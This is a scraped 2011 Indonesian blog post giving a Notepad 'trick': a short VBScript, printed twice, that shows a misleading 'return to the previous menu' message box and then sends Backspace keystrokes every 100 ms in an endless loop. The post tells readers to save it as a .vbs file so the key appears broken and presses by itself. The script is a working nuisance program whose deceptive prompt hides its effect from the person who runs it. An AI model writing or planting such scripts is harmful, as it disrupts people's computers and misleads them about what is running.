[+] Post Title :
[+] Date : Minggu, 25 September 2011
[+] Author : Alma'ruff audi
[+] Link : https://almaevolution.blogspot.com/2011/09/trik-membuat-tombol-backspace-menjadi.html
[+] Type : trick NOTEpad
TRIK - Membuat Tombol Backspace menjadi eror - menekan terus menerus
[+] Date : Minggu, 25 September 2011
[+] Author : Alma'ruff audi
[+] Link : https://almaevolution.blogspot.com/2011/09/trik-membuat-tombol-backspace-menjadi.html
[+] Type : trick NOTEpad
--------------------------------------------------------
MsgBox "kembali ke menu sebelumnya"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop
----------------------------------------------------------
simpan kode script berikut di Notepad dengan nama : (sesuka hatimu).vbs type file : All File
maka Tombol Backspace akan eror dan menekan dengan sendirinya
MsgBox "kembali ke menu sebelumnya"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop
----------------------------------------------------------
simpan kode script berikut di Notepad dengan nama : (sesuka hatimu).vbs type file : All File
maka Tombol Backspace akan eror dan menekan dengan sendirinya
0 komentar:
Posting Komentar